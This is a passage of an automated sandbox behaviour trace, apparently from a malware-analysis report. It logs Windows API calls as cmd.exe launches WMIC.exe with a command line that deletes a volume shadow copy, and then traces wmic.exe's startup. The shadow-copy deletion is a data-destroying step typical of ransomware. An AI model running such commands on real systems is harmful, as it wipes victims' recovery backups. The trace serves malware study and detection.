dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0130.569] GetProcessHeap () returned 0x4c0000 [0130.569] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x20) returned 0x4d46f0 [0130.569] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0130.569] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0130.569] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0130.569] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0130.569] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0130.569] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0130.569] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0130.569] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0130.570] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0130.570] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0130.570] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0130.570] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0130.570] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0130.570] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0130.570] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0130.570] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0130.570] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0130.570] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0130.570] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0130.570] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0130.570] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0130.570] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0130.570] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0130.570] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0130.570] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0130.570] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0130.570] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0130.570] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0130.570] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0130.570] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0130.570] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0130.570] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0130.570] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0130.570] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0130.571] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0130.571] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0130.571] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0130.571] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0130.571] GetProcessHeap () returned 0x4c0000 [0130.571] HeapFree (in: hHeap=0x4c0000, dwFlags=0x0, lpMem=0x4d46f0 | out: hHeap=0x4c0000) returned 1 [0130.571] GetProcessHeap () returned 0x4c0000 [0130.571] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x12) returned 0x4d8a30 [0130.571] lstrcmpW (lpString1="\\WMIC.exe", lpString2="\\XCOPY.EXE") returned -1 [0130.572] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\wbem\\WMIC.exe", lpCommandLine="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{E369493E-E5B4-449B-8539-770BCA375ABB}'\" delete", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x30edf0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{E369493E-E5B4-449B-8539-770BCA375ABB}'\" delete", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x30eda0 | out: lpCommandLine="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{E369493E-E5B4-449B-8539-770BCA375ABB}'\" delete", lpProcessInformation=0x30eda0*(hProcess=0x54, hThread=0x50, dwProcessId=0xac8, dwThreadId=0x5b4)) returned 1 [0130.596] CloseHandle (hObject=0x50) returned 1 [0130.596] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0130.596] GetProcessHeap () returned 0x4c0000 [0130.596] HeapFree (in: hHeap=0x4c0000, dwFlags=0x0, lpMem=0x4dc360 | out: hHeap=0x4c0000) returned 1 [0130.596] GetEnvironmentStringsW () returned 0x4dad60* [0130.596] GetProcessHeap () returned 0x4c0000 [0130.596] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0xae8) returned 0x4db850 [0130.596] FreeEnvironmentStringsW (penv=0x4dad60) returned 1 [0130.596] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0132.395] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x30ece8 | out: lpExitCode=0x30ece8*=0x0) returned 1 [0132.395] CloseHandle (hObject=0x54) returned 1 [0132.395] _vsnwprintf (in: _Buffer=0x30ef58, _BufferCount=0x13, _Format="%08X", _ArgList=0x30ecf8 | out: _Buffer="00000000") returned 8 [0132.395] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0132.395] GetProcessHeap () returned 0x4c0000 [0132.395] HeapFree (in: hHeap=0x4c0000, dwFlags=0x0, lpMem=0x4db850 | out: hHeap=0x4c0000) returned 1 [0132.395] GetEnvironmentStringsW () returned 0x4dad60* [0132.395] GetProcessHeap () returned 0x4c0000 [0132.395] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0xb0e) returned 0x4db880 [0132.395] FreeEnvironmentStringsW (penv=0x4dad60) returned 1 [0132.395] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0132.395] GetProcessHeap () returned 0x4c0000 [0132.395] HeapFree (in: hHeap=0x4c0000, dwFlags=0x0, lpMem=0x4db880 | out: hHeap=0x4c0000) returned 1 [0132.395] GetEnvironmentStringsW () returned 0x4dad60* [0132.395] GetProcessHeap () returned 0x4c0000 [0132.396] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0xb0e) returned 0x4db880 [0132.396] FreeEnvironmentStringsW (penv=0x4dad60) returned 1 [0132.396] GetProcessHeap () returned 0x4c0000 [0132.396] HeapFree (in: hHeap=0x4c0000, dwFlags=0x0, lpMem=0x4d8a30 | out: hHeap=0x4c0000) returned 1 [0132.396] DeleteProcThreadAttributeList (in: lpAttributeList=0x30edb8 | out: lpAttributeList=0x30edb8) [0132.396] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.396] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0132.396] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.396] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a7de194 | out: lpMode=0x4a7de194) returned 1 [0132.396] _get_osfhandle (_FileHandle=0) returned 0x3 [0132.396] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a7de198 | out: lpMode=0x4a7de198) returned 1 [0132.396] SetConsoleInputExeNameW () returned 0x1 [0132.396] GetConsoleOutputCP () returned 0x1b5 [0132.397] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a7ebfe0 | out: lpCPInfo=0x4a7ebfe0) returned 1 [0132.397] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0132.397] exit (_Code=0) Process: id = "53" image_name = "wmic.exe" filename = "c:\\windows\\system32\\wbem\\wmic.exe" page_root = "0x221d8000" os_pid = "0xac8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "52" os_parent_pid = "0xa6c" cmd_line = "C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{E369493E-E5B4-449B-8539-770BCA375ABB}'\" delete" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 268 os_tid = 0x5b4 [0130.645] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fdd0 | out: lpSystemTimeAsFileTime=0x26fdd0*(dwLowDateTime=0x55375bf0, dwHighDateTime=0x1d68245)) [0130.645] GetCurrentProcessId () returned 0xac8 [0130.645] GetCurrentThreadId () returned 0x5b4 [0130.645] GetTickCount () returned 0x1156172 [0130.645] QueryPerformanceCounter (in: lpPerformanceCount=0x26fdd8 | out: lpPerformanceCount=0x26fdd8*=25053821333) returned 1 [0130.645] GetModuleHandleW (lpModuleName=0x0) returned 0xff970000 [0130.645] __set_app_type (_Type=0x1) [0130.645] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff9bced0) returned 0x0 [0130.646] __wgetmainargs (in: _Argc=0xff9e2380, _Argv=0xff9e2390, _Env=0xff9e2388, _DoWildCard=0, _StartInfo=0xff9e239c | out: _Argc=0xff9e2380, _Argv=0xff9e2390, _Env=0xff9e2388) returned 0 [0130.646] ??0CHString@@QEAA@XZ () returned 0xff9e2ab0 [0130.646] malloc (_Size=0x30) returned 0x615a50 [0130.646] malloc (_Size=0x70) returned 0x615a90 [0130.646] malloc (_Size=0x50) returned 0x617d30 [0130.646] malloc (_Size=0x30) returned 0x617d90 [0130.646] malloc (_Size=0x48) returned 0x617dd0 [0130.647] malloc (_Size=0x30) returned 0x617e20 [0130.647] malloc (_Size=0x30) returned 0x617e60 [0130.647] ??0CHString@@QEAA@XZ () returned 0xff9e2f58 [0130.647] malloc (_Size=0x30) returned 0x617ea0 [0130.647] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0130.647] SetConsoleCtrlHandler (HandlerRoutine=0xff9b5724, Add=1) returned 1 [0130.647] _onexit (_Func=0xff9cf378) returned 0xff9cf378 [0130.647] _onexit (_Func=0xff9cf490) returned 0xff9cf490 [0130.647] _onexit (_Func=0xff9cf4d0) returned 0xff9cf4d0 [0130.647] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0130.647] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0130.653] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0130.660] CoCreateInstance (in: rclsid=0xff9773a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff977370*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xff9e2940 | out: ppv=0xff9e2940*=0x1e71390) returned 0x0 [0130.669] GetCurrentProcess () returned 0xffffffffffffffff [0130.669] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x26fba0 | out: TokenHandle=0x26fba0*=0xf4) returned 1 [0130.669] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x26fb98 | out: TokenInformation=0x0, ReturnLength=0x26fb98) returned 0 [0130.669] malloc (_Size=0x118) returned 0x6169a0 [0130.669] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x6169a0, TokenInformationLength=0x118, ReturnLength=0x26fb98 | out: TokenInformation=0x6169a0, ReturnLength=0x26fb98) returned 1 [0130.669] AdjustTokenPrivileges (in: TokenHandle=0xf4, DisableAllPrivileges=0, NewState=0x6169a0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=878101076, Attributes=0xeac5), (Luid.LowPart=0x0, Luid.HighPart=6389472, Attributes=0x0), (Luid.LowPart=0x64006e, Luid.HighPart=7798895, Attributes=0x3b0073), (Luid.LowPart=0x57005c, Luid.HighPart=7209065, Attributes=0x6f0064), (Luid.LowPart=0x53005c, Luid.HighPart=7536761, Attributes=0x650074), (Luid.LowPart=0x5c0032, Luid.HighPart=6422615, Attributes=0x6d0065))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0130.669] free (_Block=0x6169a0) [0130.669] CloseHandle (hObject=0xf4) returned 1 [0130.670] malloc (_Size=0x40) returned 0x617ee0 [0130.670] malloc (_Size=0x40) returned 0x617f30 [0130.670] malloc (_Size=0x40) returned 0x617f80 [0130.670] malloc (_Size=0x20a) returned 0x6169a0 [0130.670] GetSystemDirectoryW (in: lpBuffer=0x6169a0, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0130.670] free (_Block=0x6169a0) [0130.670] malloc (_Size=0x18) returned 0xcdfb0 [0130.670] malloc (_Size=0x18) returned 0x6169a0 [0130.670] malloc (_Size=0x18) returned 0x6169c0 [0130.670] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0130.670] SysStringLen (param_1="\\kernel32.dll") returned 0xd [0130.670] free (_Block=0xcdfb0) [0130.670] free (_Block=0x6169a0) [0130.670] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\kernel32.dll") returned 0x77940000 [0130.671] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0130.671] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0130.671] FreeLibrary (hLibModule=0x77940000) returned 1 [0130.671] free (_Block=0x6169c0) [0130.671] _vsnwprintf (in: _Buffer=0x617f80, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x26f7c8 | out: _Buffer="ms_409") returned 6 [0130.671] malloc (_Size=0x20) returned 0x6169a0 [0130.671] GetComputerNameW (in: lpBuffer=0x6169a0, nSize=0x26fba0 | out: lpBuffer="XDUWTFONO", nSize=0x26fba0) returned 1 [0130.672] lstrlenW (lpString="XDUWTFONO") returned 9 [0130.672] malloc (_Size=0x14) returned 0xcdfb0 [0130.672] lstrlenW (lpString="XDUWTFONO") returned 9 [0130.672] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x26fb98 | out: lpNameBuffer=0x0, nSize=0x26fb98) returned 0x7fffffde000 [0130.673] GetLastError () returned 0xea [0130.673] malloc (_Size=0x40) returned 0x6169d0 [0130.673] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x6169d0, nSize=0x26fb98 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x26fb98) returned 0x1 [0130.673] lstrlenW (lpString="") returned 0 [0130.673] lstrlenW (lpString="XDUWTFONO") returned 9 [0130.673] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0130.674] lstrlenW (lpString=".") returned 1 [0130.674] lstrlenW (lpString="XDUWTFONO") returned 9 [0130.674] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2=".", cchCount2=1) returned 3 [0130.674] lstrlenW (lpString="LOCALHOST") returned 9 [0130.674] lstrlenW (lpString="XDUWTFONO") returned 9 [0130.674] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="LOCALHOST", cchCount2=9) returned 3 [0130.674] lstrlenW (lpString="XDUWTFONO") returned 9 [0130.674] lstrlenW (lpString="XDUWTFONO") returned 9 [0130.674] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="XDUWTFONO", cchCount2=9) returned 2 [0130.675] free (_Block=0xcdfb0) [0130.675] lstrlenW (lpString="XDUWTFONO") returned 9 [0130.675] malloc (_Size=0x14) returned 0xcdfb0 [0130.675] lstrlenW (lpString="XDUWTFONO") returned 9 [0130.675] lstrlenW (lpString="XDUWTFONO") returned 9 [0130.675] malloc (_Size=0x14) returned 0x616a20 [0130.675] lstrlenW (lpString="XDUWTFONO") returned 9 [0130.675] malloc (_Size=0x8) returned 0x616a40 [0130.675] malloc (_Size=0x18) returned 0x616a60 [0130.675] malloc (_Size=0x30) returned 0x616a80 [0130.675] malloc (_Size=0x18) returned 0x616ac0 [0130.675] SysStringLen (param_1="IDENTIFY") returned 0x8 [0130.675] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0130.675] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0130.675] SysStringLen (param_1="IDENTIFY") returned 0x8 [0130.675] malloc (_Size=0x30) returned 0x616ae0 [0130.675] malloc (_Size=0x18) returned 0x616b20 [0130.675] SysStringLen (param_1="IMPERSONATE") returned 0xb [0130.675] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0130.675] SysStringLen (param_1="IMPERSONATE") returned 0xb [0130.675] SysStringLen (param_1="IDENTIFY") returned 0x8 [0130.675] SysStringLen (param_1="IDENTIFY") returned 0x8 [0130.676] SysStringLen (param_1="IMPERSONATE") returned 0xb [0130.676] malloc (_Size=0x30) returned 0x616b40 [0130.676] malloc (_Size=0x18) returned 0x616b80 [0130.676] SysStringLen (param_1="DELEGATE") returned 0x8 [0130.676] SysStringLen (param_1="IDENTIFY") returned 0x8 [0130.676] SysStringLen (param_1="DELEGATE") returned 0x8 [0130.676] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0130.676] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0130.676] SysStringLen (param_1="DELEGATE") returned 0x8 [0130.676] malloc (_Size=0x30) returned 0x616ba0 [0130.676] malloc (_Size=0x18) returned 0x616be0 [0130.676] malloc (_Size=0x30) returned 0x616c00 [0130.676] malloc (_Size=0x18) returned 0x616c40 [0130.676] SysStringLen (param_1="NONE") returned 0x4 [0130.676] SysStringLen (param_1="DEFAULT") returned 0x7 [0130.676] SysStringLen (param_1="DEFAULT") returned 0x7 [0130.676] SysStringLen (param_1="NONE") returned 0x4 [0130.676] malloc (_Size=0x30) returned 0x616c60 [0130.676] malloc (_Size=0x18) returned 0x616ca0 [0130.676] SysStringLen (param_1="CONNECT") returned 0x7 [0130.676] SysStringLen (param_1="DEFAULT") returned 0x7 [0130.676] malloc (_Size=0x30) returned 0x616cc0 [0130.676] malloc (_Size=0x18) returned 0x616d00 [0130.676] SysStringLen (param_1="CALL") returned 0x4 [0130.676] SysStringLen (param_1="DEFAULT") returned 0x7 [0130.676] SysStringLen (param_1="CALL") returned 0x4 [0130.677] SysStringLen (param_1="CONNECT") returned 0x7 [0130.677] malloc (_Size=0x30) returned 0x616d20 [0130.677] malloc (_Size=0x18) returned 0x616d60 [0130.677] SysStringLen (param_1="PKT") returned 0x3 [0130.677] SysStringLen (param_1="DEFAULT") returned 0x7 [0130.677] SysStringLen (param_1="PKT") returned 0x3 [0130.677] SysStringLen (param_1="NONE") returned 0x4 [0130.677] SysStringLen (param_1="NONE") returned 0x4 [0130.677] SysStringLen (param_1="PKT") returned 0x3 [0130.677] malloc (_Size=0x30) returned 0x616d80 [0130.677] malloc (_Size=0x18) returned 0x616dc0 [0130.677] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0130.677] SysStringLen (param_1="DEFAULT") returned 0x7 [0130.677] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0130.677] SysStringLen (param_1="NONE") returned 0x4 [0130.677] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0130.677] SysStringLen (param_1="PKT") returned 0x3 [0130.677] SysStringLen (param_1="PKT") returned 0x3 [0130.677] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0130.677] malloc (_Size=0x30) returned 0x618000 [0130.678] malloc (_Size=0x18) returned 0x616de0 [0130.678] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0130.678] SysStringLen (param_1="DEFAULT") returned 0x7 [0130.678] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0130.678] SysStringLen (param_1="PKT") returned 0x3 [0130.678] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0130.678] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0130.678] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0130.678] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0130.678] malloc (_Size=0x30) returned 0x618040 [0130.678] malloc (_Size=0x40) returned 0x616e00 [0130.678] malloc (_Size=0x20a) returned 0x616e50 [0130.678] GetSystemDirectoryW (in: lpBuffer=0x616e50, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0130.679] free (_Block=0x616e50) [0130.679] malloc (_Size=0x18) returned 0x616e50 [0130.679] malloc (_Size=0x18) returned 0x616e70 [0130.679] malloc (_Size=0x18) returned 0x616e90 [0130.679] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0130.679] SysStringLen (param_1="\\wbem\\") returned 0x6 [0130.679] free (_Block=0x616e50) [0130.679] free (_Block=0x616e70) [0130.679] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0130.679] free (_Block=0x616e90) [0130.679] malloc (_Size=0x18) returned 0x616e50 [0130.679] malloc (_Size=0x18) returned 0x616e70 [0130.679] malloc (_Size=0x18) returned 0x616e90 [0130.679] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0130.679] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0130.679] free (_Block=0x616e50) [0130.679] free (_Block=0x616e70) [0130.680] GetCurrentThreadId () returned 0x5b4 [0130.680] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x26f4a0 | out: phkResult=0x26f4a0*=0xf8) returned 0x0 [0130.680] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x26f4f0, lpcbData=0x26f490*=0x400 | out: lpType=0x0, lpData=0x26f4f0*=0x30, lpcbData=0x26f490*=0x4) returned 0x0 [0130.680] _wcsicmp (_String1="0", _String2="1") returned -1 [0130.680] _wcsicmp (_String1="0", _String2="2") returned -2 [0130.680] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x26f490*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x26f490*=0x42) returned 0x0 [0130.680] malloc (_Size=0x86) returned 0x616eb0 [0130.680] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x616eb0, lpcbData=0x26f490*=0x42 | out: lpType=0x0, lpData=0x616eb0*=0x25, lpcbData=0x26f490*=0x42) returned 0x0 [0130.680] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0130.680] malloc (_Size=0x42) returned 0x616f40 [0130.680] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0130.680] RegQueryValueExW (in: hKey=0xf8, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x26f4f0, lpcbData=0x26f490*=0x400 | out: lpType=0x0, lpData=0x26f4f0*=0x36, lpcbData=0x26f490*=0xc) returned 0x0 [0130.680] _wtol (_String="65536") returned 65536 [0130.680] free (_Block=0x616eb0) [0130.680] RegCloseKey (hKey=0x0) returned 0x6 [0130.680] CoCreateInstance (in: rclsid=0xff977410*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff9773f0*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x26f998 | out: ppv=0x26f998*=0x22d71d0) returned 0x0 [0130.702] FreeThreadedDOMDocument:IXMLDOMDocument:Load (in: This=0x22d71d0, xmlSource=0x26fae0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x616e50), isSuccessful=0x26fb50 | out: isSuccessful=0x26fb50*=0xffff) returned 0x0 [0130.843] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x22d71d0, DOMElement=0x26f990 | out: DOMElement=0x26f990) returned 0x0 [0130.843] malloc (_Size=0x18) returned 0x616e50 [0130.844] free (_Block=0x616e50) [0130.844] malloc (_Size=0x18) returned 0x616e50 [0130.844] free (_Block=0x616e50) [0130.844] malloc (_Size=0x18) returned 0x616e50 [0130.845] malloc (_Size=0x18) returned 0x616e70 [0130.845] malloc (_Size=0x30) returned 0x618080 [0130.845] malloc (_Size=0x18) returned 0x616eb0 [0130.845] free (_Block=0x616eb0) [0130.845] malloc (_Size=0x18) returned 0x61c560 [0130.845] malloc (_Size=0x18) returned 0x61c580 [0130.845] SysStringLen (param_1="VALUE") returned 0x5 [0130.845] SysStringLen (param_1="TABLE") returned 0x5 [0130.845] SysStringLen (param_1="TABLE") returned 0x5 [0130.845] SysStringLen (param_1="VALUE") returned 0x5 [0130.845] malloc (_Size=0x30) returned 0x6180c0 [0130.846] malloc (_Size=0x18) returned 0x61c5a0 [0130.846] free (_Block=0x61c5a0) [0130.846] malloc (_Size=0x18) returned 0x61c5a0 [0130.846] malloc (_Size=0x18) returned 0x61c5c0 [0130.846] SysStringLen (param_1="LIST") returned 0x4 [0130.846] SysStringLen (param_1="TABLE") returned 0x5 [0130.846] malloc (_Size=0x30) returned 0x618100 [0130.846] malloc (_Size=0x18) returned 0x61c5e0 [0130.846] free 